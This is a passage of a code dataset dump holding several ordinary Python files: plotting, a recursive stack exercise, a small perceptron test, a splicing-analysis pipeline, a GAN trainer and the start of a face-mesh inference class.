edge_w, grid, radiusm):\n\tplt.clf()\n\tdef r_(u):\n\t\tr = exp(a *u)\n\t\treturn r\n\n\ta = radiusm\n\tu = linspace(-5 *pi, pi,1000)\n\tr = r_(u)\n\n\tax = plt.subplot(111)\n\tax.projection='polar'\n\n\tax.patch.set_facecolor(\"black\")\n\tax.xaxis.set_tick_params(color=\"white\", labelcolor=\"white\")\n\tax.yaxis.set_tick_params(color=\"white\", labelcolor=\"white\")\n\n\tplt.axis(grid)\n\tplt.axis('equal')\n\n\tplt.plot(u, r, color=edge_c, linewidth=edge_w)\n","sub_path":"src/Current Models/Two Space/log_spiral.py","file_name":"log_spiral.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"467059788","text":"'''\n实现一个栈的逆序,但是只能用递归函数和这个栈本身的pop操作来实现,而不能自己\n申请另外的数据结构。给定一个整数数组A即为给定的栈,同时给定它的大小n,请返回逆序后的栈。\n测试样例:\n[4,3,2,1],4\n返回:[1,2,3,4]\n'''\nclass StackReverse:\n def get_bottom_ele(self,A):\n #获取栈底元素\n res = A.pop()\n if len(A) == 0:\n return res\n else:\n last = self.get_bottom_ele(A)\n A.append(res)\n return last\n\n def reverseStack(self, A, n):\n # write code here\n if len(A) == 0:\n return\n else:\n ele = self.get_bottom_ele(A)\n self.reverseStack(A, len(A))\n A.append(ele)\n return A\n\n\nif __name__ == '__main__':\n A = [3,2,1]\n print(StackReverse().reverseStack(A,3))\n\n","sub_path":"data_structure_and_algorithms/stack_and_queue/exer3.py","file_name":"exer3.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"585322768","text":"import NeuralNet as classifier\nimport csv\nimport random\nfrom _sqlite3 import Row\ndata = []\nwith open('irisData.csv', newline='') as f:\n reader = csv.reader(f)\n next(reader)\n for row in reader:\n curr = row.pop(4)\n temp = []\n if curr == 'setosa':\n temp.append(0)\n temp.extend([float(i) for i in row])\n data.append(temp)\n elif curr == 'versicolor':\n temp.append(1)\n temp.extend([float(i) for i in row])\n data.append(temp)\nrandom.shuffle(data)\nfinalTest = data.pop()\n(weights,theta,epsilon) = classifier.train(data)\nprint(\"Testing training data:\")\nfor i in range(len(data)):\n sum = 0\n for j in range(len(weights)):\n sum += weights[j]*data[i][j]\n if sum > (theta - epsilon):\n print(\"We compute 1, actually: \"+str(data[i][0]))\n else:\n print(\"We compute 0, actually: \"+str(data[i][0]))\nprint(\"Testing never seen data:\")\nsum = 0\nfor j in range(len(weights)):\n sum += weights[j]*data[i][j]\nif sum > (theta - epsilon):\n print(\"We compute 1, actually: \"+str(data[i][0]))\nelse:\n print(\"We compute 0, actually: \"+str(data[i][0]))\n\n\n ","sub_path":"NeuralNetCall.py","file_name":"NeuralNetCall.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"106710111","text":"import re\nimport numpy as np\n\ndef plantopolicy(mov):\n\tx = ['r','g','b','y','p','o']\n\ty = ['r','g','b','y','p','o','table','outoftable']\n\txycomb = []\n\tfor i in x:\n\t\tfor j in y:\n\t\t\tif i!=j:\n\t\t\t\txycomb.append(\"move(\"+i+\",\"+j+\")\")\n\n\tmovelist = re.findall(r'move\\([^()]*\\)', mov)\n\tplist = []\n\n\tfor i in movelist :\n\t\tind = 0\n\t\tp = list(np.zeros(42, dtype=int))\n\t\tfor j in range(0,len(xycomb)):\n\t\t\tif xycomb[j]==i:\n\t\t\t\tind = j\n\t\tp[ind]=1\n\t\tplist.append(p)\n\n\treturn plist\n\npl= []\npl = plantopolicy(\"move(r,table)\")\nprint(pl)\n\n'''\nmove(x,y)\nx - r/g/b/y/p/o \ny - r/g/b/y/p/o/table/outoftable \nif x!=y\n6*8-6 \n'''","sub_path":"Misc/movedecompose_plan2policy.py","file_name":"movedecompose_plan2policy.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525667970","text":"import sys\nimport scipy as sp\nimport scipy.stats as spst\nimport h5py\nimport os\nimport re\nimport pickle\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.markers as markers\nfrom sklearn.decomposition import PCA\n\nCONF = 2\n\nsys.path.append('..')\nfrom paths import BASEDIR,BASEDIR_AS\n\nbasedir = os.path.join(BASEDIR_AS, 'alternative_splicing')\nmetatable = os.path.join(BASEDIR, 'ICGC/orig_data/metadata/per_aliquot_v2/rnaseq_metadata.histo.tsv')\nplotdir = os.path.join(basedir, 'plots', 'psi_deviation_histo')\nif not os.path.exists(plotdir):\n os.makedirs(plotdir)\n\n### settings\n# min PSI deviation threshold\npsi_thresh = 4\n# do we compute the deviation from the PSI mean over all samples\n# or relative to the mean of the individual subtypes?\nper_subtype = True\n# subset events to a set of functionally interesting ones\nfunctional_only = True\nfunctional_tag = ''\nif functional_only:\n functional_tag = '_func'\n\nevent_short_dict = {'exon_skip':'es', \n 'intron_retention':'ir',\n 'alt_3prime':'a3',\n 'alt_5prime':'a5',\n 'mult_exon_skip':'ms',\n 'mutex_exons':'mx'}\n\nif len(sys.argv) < 2:\n print('Usage: %s ' % sys.argv[0], file=sys.stderr)\n sys.exit(1)\nevent_type = sys.argv[1]\n\n### prep metadata\nmetadata = []\nfor line in open(metatable, 'r'):\n sl = line.strip().split('\\t')\n metadata.append(sl)\nmetadata = sp.array(metadata, dtype='str')\nheader = metadata[0, :]\nmetadata = metadata[1:, :]\naidx = sp.where(header == 'analysis_id')[0]\nalidx = sp.where(header == 'aliquot_id')[0]\ntidx = sp.where(header == 'is_tumour')[0]\npidx = sp.where(header == 'project_code')[0]\nhidx = sp.where(header == 'histotype')[0]\n\nhdf5_countfile = os.path.join(basedir, 'merge_graphs_%s_C%i.counts.hdf5' % (event_type, CONF))\nhdf5_psifile = os.path.join(basedir, 'merge_graphs_%s_C%i.counts.psi_conf.hdf5' % (event_type, CONF))\nfunc_idx_file = os.path.join(basedir, 'merge_graphs_%s_C%i.function_idx.cpickle' % (event_type, CONF))\n\nIN = h5py.File(hdf5_countfile, 'r')\n\n### get relevant index vectors\ncidx = IN['conf_idx'][:].astype('int')\ngidx = IN['gene_idx'][:][cidx].astype('int')\nstrains = sp.array([x.split('.')[0] for x in IN['strains'][:]], dtype='str')\nevent_idx = cidx + 1\n\n### load psi of confident events\nif os.path.exists(hdf5_psifile):\n print('loading %i confident events from %s' % (cidx.shape[0], hdf5_psifile), file=sys.stderr)\n IN2 = h5py.File(hdf5_psifile, 'r')\n psi = IN2['psi'][:]\n IN2.close()\nelse:\n print('loading %i confident events from %s' % (cidx.shape[0], hdf5_countfile), file=sys.stderr)\n psi = sp.empty((IN['psi'].shape[0], cidx.shape[0]), dtype='float')\n for i in range(psi.shape[0]):\n if i > 0 and i % 10 == 0:\n sys.stderr.write('.')\n if i % 100 == 0:\n sys.stderr.write('%i/%i strains done\\n' % (i, psi.shape[0]))\n tmp = IN['psi'][i, :]\n psi[i, :] = tmp[cidx]\n OUT = h5py.File(hdf5_psifile, 'w')\n OUT.create_dataset(name='psi', data=psi, compression='gzip')\n OUT.close()\nprint('\\n...done', file=sys.stderr)\n\n### sort metadata by strains and subset psi values to \n### donors present in metadata\na, b = sp.where(strains[:, sp.newaxis] == metadata[:, aidx[0]])\nassert sp.all(strains[a] == metadata[:, aidx[0]][b]) \nstrains = strains[a]\npsi = psi[a, :]\nmetadata = metadata[b, :]\n\n### remove normals from analysis\nis_tumor = sp.where(metadata[:, tidx[0]] == 'yes')[0]\nstrains = strains[is_tumor]\npsi = psi[is_tumor, :]\nmetadata = metadata[is_tumor, :]\n\n### filter for functional events only\nif functional_only:\n print('filtering for functional events', file=sys.stderr)\n cidx_filt = pickle.load(open(func_idx_file, 'r'))\n k_idx = sp.where(sp.in1d(cidx, cidx_filt))[0]\n psi = psi[:, k_idx]\n gidx = gidx[k_idx]\n cidx = cidx[k_idx]\n event_idx = event_idx[k_idx]\n print('retaining %s events' % k_idx.shape[0], file=sys.stderr)\n\n### filter even more strictly\nprint('filtering for missing data', file=sys.stderr)\nkeep_mat = None\nif per_subtype:\n #proj_idx = sp.where(header == 'histotype')[0][0]\n #projects = sp.unique(metadata[:, proj_idx])\n projects = sp.unique([':'.join([metadata[i, pidx[0]], metadata[i, hidx[0]]]) for i in range(metadata.shape[0])])\n keep_mat = sp.zeros((projects.shape[0], psi.shape[1]), dtype='bool')\n for p, project in enumerate(projects):\n print('processing subtype %s (%i/%i)' % (project, p + 1, projects.shape[0]))\n curr_idx = sp.where((metadata[:, pidx[0]] == project.split(':')[0]) & (metadata[:, hidx[0]] == project.split(':')[1]))[0]\n nan_frac = sp.mean(sp.isnan(psi[curr_idx, :]).astype('float'), axis=0)\n kidx = sp.where(nan_frac < 0.3)[0]\n keep_mat[p, kidx] = True\n kidx = keep_mat.max(axis=0)\nelse:\n #kidx = sp.where(sp.sum(sp.isnan(psi), axis=0) < (0.3 * psi.shape[0]))[0]\n kidx = sp.where(sp.mean(sp.isnan(psi).astype('float'), axis=0) < 0.3)[0]\n\npsi = psi[:, kidx]\ngidx = gidx[kidx]\ncidx = cidx[kidx]\nevent_idx = event_idx[kidx]\nif not keep_mat is None: \n keep_mat = keep_mat[:, kidx]\nprint('%i events remain after filtering' % sp.sum(kidx), file=sys.stderr)\nprint('affecting %i genes' % sp.unique(gidx).shape[0], file=sys.stderr)\nprint('...done', file=sys.stderr)\n\n### get dev from mean per subtype\nif per_subtype:\n ### generate PSI distribution plots\n p_num = projects.shape[0]\n panels = sp.ceil(sp.sqrt(p_num)).astype('int')\n gs = gridspec.GridSpec(panels, panels)\n fig = plt.figure(figsize=(4*panels, 4*panels), dpi=200) \n\n for p, project in enumerate(projects):\n print('computing mean for subtype %s (%i/%i)' % (project, p + 1, projects.shape[0]))\n ### operate on a part of the matrix\n #curr_idx = sp.where(metadata[:, proj_idx] == project)[0]\n curr_idx = sp.where((metadata[:, pidx[0]] == project.split(':')[0]) & (metadata[:, hidx[0]] == project.split(':')[1]))[0]\n kidx = sp.where(keep_mat[p, :])[0]\n kidxn = sp.where(~keep_mat[p, :])[0] \n psi_mean = spst.nanmean(psi[curr_idx, :][:, kidx], axis=0)\n psi_stddev = spst.nanstd(psi[curr_idx, :][:, kidx], axis=0)\n for cc in curr_idx:\n psi[cc, kidx] = psi[cc, kidx] - psi_mean\n psi[cc, kidx] /= psi_stddev\n kkidx = sp.where(psi_stddev < 0.01)[0]\n psi[cc, kidx[kkidx]] = 0\n psi[cc, kidxn] = 0\n\n ax = fig.add_subplot(gs[p / panels, p % panels])\n print('plotting distribution for %s' % project)\n #ax.hexbin(psi[curr_idx, :][:, kidx].ravel(), sp.dot(sp.arange(min(curr_idx.shape[0], 100))[:, sp.newaxis], sp.ones((1, kidx.shape[0]))).ravel(), gridsize=(100, min(curr_idx.shape[0], 100)))\n #ax.hexbin(psi[curr_idx, :][:, kidx].ravel(), sp.dot(sp.arange(min(curr_idx.shape[0], 100))[:, sp.newaxis], sp.ones((1, kidx.shape[0]))).ravel(), gridsize=(10, min(curr_idx.shape[0], 100)), mincnt=1, bins='log')\n plt_mat = []\n # bounds = sp.array([ 0.01, 0.25, 0.5 , 0.75, 1. , 1.25, 1.5 , 1.75, 2. ,\n # 2.25, 2.5 , 2.75, 3. , 3.25, 3.5 , 3.75, 4. , 4.25,\n # 4.5 , 4.75, 5. ], dtype='float')\n bounds = sp.array([ 0.01, 0.1 , 0.25, 0.5 , 1., 2., 4., 8., 16 ], dtype='float')\n\n for cc in curr_idx:\n nnidx = sp.where(~sp.isnan(psi[cc, kidx]))[0]\n bins, _ = sp.histogram(psi[cc, kidx][nnidx], bins=bounds)\n ax.plot(sp.arange(bins.shape[0]) + 0.5, bins, 'b-')\n #plt_mat.append(bins)\n #plt_mat = sp.array(plt_mat)\n #ax.imshow(sp.sqrt(plt_mat), aspect='auto', interpolation='none')\n #prct95 = spst.scoreatpercentile(psi[curr_idx, :][:, kidx].ravel(), 95)\n #ylim = ax.get_ylim()\n #xlim = ax.get_xlim()\n #ax.plot([prct95, prct95], ylim, '--r', linewidth=2)\n #ax.set_ylim(ylim)\n #ax.set_xlim(xlim)\n ax.set_title(project + '(N=%i)' % curr_idx.shape)\n ax.set_xticks(sp.arange(bounds.shape[0]))\n ax.set_xticklabels(bounds, rotation=90)\n #ax.set_xticks(sp.arange(20)[::2] + 0.5)\n #ax.set_xticklabels(bounds[::2][:-1] + 0.25, rotation=90)\n ax.set_xlabel('PSI deviation')\n ax.set_ylabel('Frequency')\n\n plt.tight_layout()\n plt.savefig(os.path.join(plotdir, 'normalized_psi_distribution_noabs_histo_%s%s.png' % (event_type, functional_tag)), format='png', bbox_inches='tight')\n plt.close(fig)\n \n\n### get dev from mean over all samples\nelse:\n psi_mean = spst.nanmean(psi, axis=0)\n psi_stddev = spst.nanstd(psi, axis=0)\n psi = psi - sp.tile(psi_mean, (psi.shape[0], 1))\n psi /= sp.tile(psi_stddev, (psi.shape[0], 1))\n\n### substitute NaN values\npsi[sp.isnan(psi)] = 0\n\n#import pdb\n#pdb.set_trace()\n\n### compute PCA on psi table\nprint('Computing Event Level PCA')\npca = PCA(n_components=2)\ntrans_data = pca.fit_transform(psi)\ncmap = plt.get_cmap('jet')\nnorm = plt.Normalize(0, projects.shape[0])\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\nfor p, project in enumerate(projects):\n #curr_idx = sp.where(metadata[:, proj_idx] == project)[0]\n curr_idx = sp.where((metadata[:, pidx[0]] == project.split(':')[0]) & (metadata[:, hidx[0]] == project.split(':')[1]))[0]\n ax.plot(trans_data[curr_idx, 0], trans_data[curr_idx, 1], 'o', color=cmap(norm(p)), alpha=0.75, label=project, marker=markers.MarkerStyle.filled_markers[p % 13])\n ax.set_title('PCA - Event Level (%s)' % event_type)\n ax.set_xlabel('PC 1')\n ax.set_ylabel('PC 2')\nax.legend(numpoints=1, ncol=2, loc='center left', bbox_to_anchor=(1.05, 0.5), frameon=False)\n\nplt.tight_layout()\nplt.savefig(os.path.join(plotdir, 'normalized_psi_pca_histo_noabs_%s%s.png' % (event_type, functional_tag)), format='png', bbox_inches='tight')\nplt.close(fig)\n\n### collapse per gene\n### - if there are multiple events per gene, take event with max\n### PSI to represent the full gene\ngsidx = sp.argsort(gidx)\ngidx = gidx[gsidx]\ngidx,fidx = sp.unique(gidx, return_index=True)\nlidx = sp.r_[fidx[1:], gsidx.shape[0]]\ngene_names = IN['gene_names'][:][gidx]\n\npsi_collapsed = sp.empty((psi.shape[0], fidx.shape[0]), dtype='float')\nevent_idx_collapsed = sp.empty((psi.shape[0], fidx.shape[0]), dtype='int')\nfor i in range(lidx.shape[0]):\n tmp = sp.absolute(psi[:, gsidx[fidx[i]:lidx[i]]]).argmax(axis=1)\n event_idx_collapsed[:, i] = event_idx[gsidx[fidx[i]:lidx[i]]][tmp]\n psi_collapsed[:, i] = sp.array([psi[:, gsidx[fidx[i]:lidx[i]]][ii, jj] for ii, jj in enumerate(tmp)])\n\n### gene centric PCA\nprint('Computing Gene Level PCA')\npca = PCA(n_components=2)\ntrans_data = pca.fit_transform(psi_collapsed)\ncmap = plt.get_cmap('jet')\nnorm = plt.Normalize(0, projects.shape[0])\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\nfor p, project in enumerate(projects):\n #curr_idx = sp.where(metadata[:, proj_idx] == project)[0]\n curr_idx = sp.where((metadata[:, pidx[0]] == project.split(':')[0]) & (metadata[:, hidx[0]] == project.split(':')[1]))[0]\n ax.plot(trans_data[curr_idx, 0], trans_data[curr_idx, 1], 'o', color=cmap(norm(p)), alpha=0.75, label=project, marker=markers.MarkerStyle.filled_markers[p % 13])\n ax.set_title('PCA - Gene Level (%s)' % event_type)\n ax.set_xlabel('PC 1')\n ax.set_ylabel('PC 2')\nax.legend(numpoints=1, ncol=2, loc='center left', bbox_to_anchor=(1.05, 0.5), frameon=False)\n\nplt.tight_layout()\nplt.savefig(os.path.join(plotdir, 'normalized_psi_per_gene_pca_histo_noabs_%s%s.png' % (event_type, functional_tag)), format='png', bbox_inches='tight')\nplt.close(fig)\n\npsi_collapsed = psi_collapsed.T\npsi_collapsed_bin = (sp.absolute(psi_collapsed) >= psi_thresh)\nevent_idx_collapsed = event_idx_collapsed.T.astype('str')\nfor i in range(event_idx_collapsed.shape[0]):\n for j in range(event_idx_collapsed.shape[1]):\n event_idx_collapsed[i, j] = event_short_dict[event_type] + ':' + event_idx_collapsed[i, j]\n\npsi_collapsed = psi_collapsed.astype('str')\n#psi_collapsed = sp.r_[strains[sp.newaxis, :], psi_collapsed]\npsi_collapsed = sp.r_[metadata[:, alidx[0]][sp.newaxis, :], psi_collapsed]\npsi_collapsed = sp.c_[sp.hstack(['gene_id', gene_names]), psi_collapsed]\noutfname = os.path.join(basedir, 'merge_graphs_%s_C%i.psi_dev_histo_noabs_per_gene%s.tsv.gz' % (event_type, CONF, functional_tag))\nif not os.path.exists(outfname):\n sp.savetxt(outfname, psi_collapsed, fmt='%s', delimiter='\\t')\n\nevent_idx_collapsed = sp.r_[metadata[:, alidx[0]][sp.newaxis, :], event_idx_collapsed]\nevent_idx_collapsed = sp.c_[sp.hstack(['gene_id', gene_names]), event_idx_collapsed]\noutfname = os.path.join(basedir, 'merge_graphs_%s_C%i.psi_dev_histo_noabs_per_gene%s.event_ids.tsv.gz' % (event_type, CONF, functional_tag))\nif not os.path.exists(outfname):\n print('writing ' + outfname)\n sp.savetxt(outfname, event_idx_collapsed, fmt='%s', delimiter='\\t')\n\nkidx = sp.where(sp.sum(psi_collapsed_bin, axis=1) > 0)[0] \npsi_collapsed_bin = psi_collapsed_bin[kidx, :]\ngene_names = gene_names[kidx]\n\n### how sparse is the binary matrix for the given cutoff?\nsparsity = sp.sum(psi_collapsed_bin.astype('int') != 0).astype('float') / (psi_collapsed_bin.shape[0] * psi_collapsed_bin.shape[1]) * 100\nprint('given the current threshold of %i, %.2f percent of the matrix are non-zero' % (psi_thresh, sparsity))\n\npsi_collapsed_bin = psi_collapsed_bin.astype('int').astype('str')\n#psi_collapsed_bin = sp.r_[strains[sp.newaxis, :], psi_collapsed_bin]\npsi_collapsed_bin = sp.r_[metadata[:, alidx[0]][sp.newaxis, :], psi_collapsed_bin]\npsi_collapsed_bin = sp.c_[sp.hstack(['gene_id', gene_names]), psi_collapsed_bin]\noutfname = os.path.join(basedir, 'merge_graphs_%s_C%i.psi_dev_histo_noabs_per_gene_binary%s.min%i.tsv.gz' % (event_type, CONF, functional_tag, psi_thresh))\nsp.savetxt(outfname, psi_collapsed_bin, fmt='%s', delimiter='\\t')\n\nIN.close()\n","sub_path":"gene_centric_tables/psi_deviance_noabs_histo.py","file_name":"psi_deviance_noabs_histo.py","file_ext":"py","file_size_in_byte":13927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"213227140","text":"def calPercent(obtainedMarks,maxMarks):\n '''\n objective : To calculate the percentage of the given marks \n arguments:\n obtainedMarks : the marks obtained by the student\n\t\tmaxMarks : the maximum marks possible\n approach : Using arithmetic operations\n return value : \n\t\tpercentage : The calculated percentage is returned\n\t\t'''\n percentage=(obtainedMarks/maxMarks)*100\n return percentage\n \ndef main():\n '''\n objective: To calculate the percentage of the given marks\n User inputs :\n obtainedMarks : The marks obatined by the student\n maxMarks : The maximum marks possible\n calPercentage : The calculated percentage which is returned\n approach: Using function calPercent()\n '''\n obtainedMarks = int(input(\"Enter Marks: \"))\n maxMarks = int(input(\"Enter max Marks: \"))\n calPercentage = calPercent(obtainedMarks,maxMarks)\n print(\"Percentage: \", calPercentage)\n print(\"End of Main\")\n \nif __name__ == \"__main__\":\n main()\n print(\"End of Program\")\n","sub_path":"hw-piazza/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"613062940","text":"import torch\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torchvision.utils as vutils\r\nfrom base.base_trainer import BaseTrainer\r\nfrom loss.dloss import CriterionD\r\nfrom loss.ganloss import GANLoss\r\nfrom base.utils import make_parts_shape\r\n\r\n\r\nclass FullTrainer(BaseTrainer):\r\n def __init__(self, opt, dataloader, criterion, model, testloader):\r\n super().__init__(opt, dataloader, criterion, model.gnet)\r\n self.testloader = testloader\r\n self.dnet = model.dnet\r\n self.dnet_s = model.dnet_s\r\n self.criterion_d = CriterionD(use_lsgan=True)\r\n self.criterionGAN = GANLoss(use_lsgan=True)\r\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n def train(self):\r\n print(f'Use device: {self.device}'\r\n f'Network:\\n'\r\n f'In channels: {self.n_channels} '\r\n f'Out channels: {self.n_classes}')\r\n self.model.to(device=self.device)\r\n self.dnet.to(device=self.device)\r\n self.dnet_s.to(device=self.device)\r\n\r\n optimizer_G = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)\r\n optimizer_D = torch.optim.Adam(self.dnet.parameters(), lr=self.learning_rate)\r\n optimizer_Ds = torch.optim.Adam(self.dnet_s.parameters(), lr=self.learning_rate)\r\n\r\n test_batch = iter(self.testloader).next()\r\n test_img = test_batch['input']['image']\r\n test_img = test_img.type(torch.FloatTensor).to(self.device)\r\n test_pose = test_batch['input']['t_pose']\r\n test_pose = test_pose.type(torch.FloatTensor).to(self.device)\r\n test_map = test_batch['input']['s_map']\r\n test_map = test_map.type(torch.FloatTensor).to(self.device)\r\n for epoch in range(self.epochs):\r\n for idx, data_batch in enumerate(self.dataloader):\r\n img = data_batch['input']['image']\r\n smap = data_batch['input']['s_map']\r\n t_pose = data_batch['input']['t_pose']\r\n target = data_batch['input']['target']\r\n t_map = data_batch['input']['t_map']\r\n img = img.type(torch.FloatTensor).to(self.device)\r\n t_pose = t_pose.type(torch.FloatTensor).to(self.device)\r\n target = target.type(torch.FloatTensor).to(self.device)\r\n smap = smap.type(torch.FloatTensor).to(self.device)\r\n t_map = t_map.type(torch.FloatTensor).to(self.device)\r\n # image discriminator\r\n self.dnet.zero_grad()\r\n real_out_d = self.dnet(target)\r\n label_d = torch.full(real_out_d.size(), 1, device=self.device)\r\n real_loss_d = self.criterion_d(real_out_d, label_d)\r\n real_loss_d.backward()\r\n\r\n fake, fake_smap = self.model(img, t_pose, smap)\r\n fake_out_d = self.dnet(fake.detach())\r\n label_d.fill_(0)\r\n fake_loss_d = self.criterion_d(fake_out_d, label_d)\r\n fake_loss_d.backward()\r\n\r\n err_d = real_loss_d + fake_loss_d\r\n optimizer_D.step()\r\n\r\n # semantic map discriminator\r\n self.dnet_s.zero_grad()\r\n real_out_d = self.dnet_s(t_map)\r\n label_d = torch.full(real_out_d.size(), 1, device=self.device)\r\n real_loss_d = self.criterion_d(real_out_d, label_d)\r\n real_loss_d.backward()\r\n\r\n fake_out_d = self.dnet_s(fake_smap.detach())\r\n label_d.fill_(0)\r\n fake_loss_d = self.criterion_d(fake_out_d, label_d)\r\n fake_loss_d.backward()\r\n\r\n err_ds = real_loss_d + fake_loss_d\r\n optimizer_Ds.step()\r\n\r\n self.model.zero_grad()\r\n fake_score_d = self.dnet(fake)\r\n fake_score_ds = self.dnet_s(fake_smap)\r\n label_d.fill_(1)\r\n l_gan1 = self.criterionGAN(fake_score_d, label_d)\r\n l_gan2 = self.criterionGAN(fake_score_ds, label_d)\r\n loss_l1, loss_p = self.criterionPerPixel(fake, target)\r\n loss_l1_s, loss_ps = self.criterionPerPixel(fake_smap, t_map)\r\n err_g = 10 * loss_l1 + 0.8 * loss_p # + 0.1 * l_gan1 + l_gan2\r\n err_g.backward()\r\n optimizer_G.step()\r\n if idx % 200 == 0:\r\n print('Epoch: {}, Iter: {}, gloss: {:.5f}, l1: {:.5f}, l1_s: {:.5f},'\r\n 'lp: {:.5f}, lps: {:.5f}, lg: {:.5f}, lg2: {:.5f}, ld: {:.5f}, lds: {:.5f}'.format(\r\n epoch, idx, err_g.item(), loss_l1.item(), loss_l1_s.item(), loss_p.item(), loss_ps.item(),\r\n l_gan1.item(), l_gan2.item(), err_d.item(), err_ds.item()))\r\n\r\n if idx % 200 == 0 or (epoch == self.epochs - 1 and idx == len(self.dataloader - 1)):\r\n torch.save(self.dnet.state_dict(), './model/d_net.pth')\r\n torch.save(self.model.state_dict(), './model/g_net.pth')\r\n with torch.no_grad():\r\n fake_, fake_map = self.model(test_img, test_pose, test_map)\r\n fake_ = fake_.detach().cpu()\r\n fake_map = fake_map.detach().cpu()\r\n target_ = (test_batch['input']['target']).detach().cpu()\r\n source = (test_batch['input']['t_map']).detach().cpu()\r\n poses = (test_batch['input']['t_pose']).detach().cpu()\r\n poses = torch.unsqueeze(torch.sum(poses, dim=1), dim=1)\r\n sample_target = vutils.make_grid(target_, padding=2, normalize=False)\r\n sample_source = vutils.make_grid(source, padding=2, normalize=False)\r\n sample_pose = vutils.make_grid(poses, padding=2, normalize=False)\r\n sample = vutils.make_grid(fake_, padding=2, normalize=False)\r\n sample_map = vutils.make_grid(fake_map, padding=2, normalize=False)\r\n plt.figure(figsize=(32, 16))\r\n plt.axis('off')\r\n plt.title('fake image')\r\n plt.subplot(5, 1, 1)\r\n plt.imshow(np.transpose(sample_source, (1, 2, 0)))\r\n plt.subplot(5, 1, 2)\r\n plt.imshow(np.transpose(sample_pose, (1, 2, 0)))\r\n plt.subplot(5, 1, 3)\r\n plt.imshow(np.transpose(sample, (1, 2, 0)))\r\n plt.subplot(5, 1, 4)\r\n plt.imshow(np.transpose(sample_target, (1, 2, 0)))\r\n plt.subplot(5, 1, 5)\r\n plt.imshow(np.transpose(sample_map, (1, 2, 0)))\r\n plt.savefig(\"./sample/epoch_{}_iter_{}.png\".format(epoch, idx))\r\n plt.close()\r\n\r\n","sub_path":"FullTrainer.py","file_name":"FullTrainer.py","file_ext":"py","file_size_in_byte":6891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7513907","text":"# Copyright (c) 2019 Alexander Mishurov.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n\nimport os\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom skimage.transform import estimate_transform, warp\nimport message_pb2\n\nfrom ..baseModel import BaseModel\n\n\nDATA_PATH = './models/arcore/data'\n\nFACEMESH_MODEL_PATH = os.path.join(\n DATA_PATH, 'facemesh-lite_nocrawl-2019_01_14-v0.tflite')\n\nDETECTOR_MODEL_PATH = os.path.join(DATA_PATH, 'opencv_face_detector_uint8.pb')\n\nDETECTOR_CONFIG_PATH = os.path.join(DATA_PATH, 'opencv_face_detector.pbtxt')\n\nFACEMESH_OBJ_PATH = os.path.join(DATA_PATH, 'canonical_face_mesh.obj')\n\n\ndef read_obj(path):\n v_values = []\n vt_values = []\n vn_values = []\n f_indices = []\n\n def parse_values(line):\n return [float(v) for v in line.split()[1:]]\n\n def parse_indices(line):\n return [[int(i) - 1 for i in t.split(\"/\")] for t in line.split()[1:]]\n\n # Map .obj lines to parsing functions\n parse_map = {\n \"v \": [v_values, parse_values],\n \"vt\": [vt_values, parse_values],\n \"vn\": [vn_values, parse_values],\n \"f \": [f_indices, parse_indices],\n }\n\n def parse_line(l):\n attr = l[:2]\n if attr in parse_map.keys():\n p = parse_map[attr]\n p[0].append(p[1](l))\n\n with open(path) as obj:\n [parse_line(l) for l in obj.readlines()]\n\n # Construct flat arrays of face indices and face corners' attributes\n uvs = []\n normals = []\n faces = []\n for f in f_indices:\n for indices in f:\n faces.append(indices[0])\n uv = vt_values[indices[1]][:]\n # Add 0 and 1 to every uv for Nuke\n uv.extend([0., 1.])\n uvs.extend(uv)\n norm = vn_values[indices[2]][:]\n # Invert normal's z for Nuke\n norm[2] *= -1\n normals.extend(norm)\n\n return faces, uvs, normals\n\n\nclass Model(BaseModel):\n def __init__(self):\n super(Model, self).__init__()\n self.name = 'Google ARCore'\n\n # Define options\n self.detect_face = True\n self.options = ('detect_face',)\n\n # Define inputs/outputs\n self.inputs = {'input': 3}\n self.outputs = {'output': 3}\n\n # Configure face detector and mesh models\n self.interpreter = tf.lite.Interpreter(model_path=FACEMESH_MODEL_PATH)\n self.interpreter.allocate_tensors()\n self.detector = cv2.dnn.readNetFromTensorflow(\n DETECTOR_MODEL_PATH, DETECTOR_CONFIG_PATH)\n\n input_details = self.interpreter.get_input_details()\n self.input_shape = input_details[0]['shape']\n self.input_index = input_details[0]['index']\n output_details = self.interpreter.get_output_details()\n self.output_index = output_details[0]['index']\n\n # Define 3 points of the input for simiarity transformation\n self.dst_points = np.array([\n [0, 0], [0, self.input_shape[1] - 1], [self.input_shape[2] - 1, 0]\n ])\n\n # Load canonical face geometry data\n self.faces, self.uvs, self.normals = read_obj(FACEMESH_OBJ_PATH)\n\n def vprint(self, msg):\n print(\"{} -> {}\".format(self.name, msg))\n\n def inference(self, image_list):\n image = image_list[0]\n image_fp32 = self.linear_to_srgb(image)\n image = (image_fp32 * 255).astype(np.uint8)\n\n h, w = image.shape[:2]\n box = 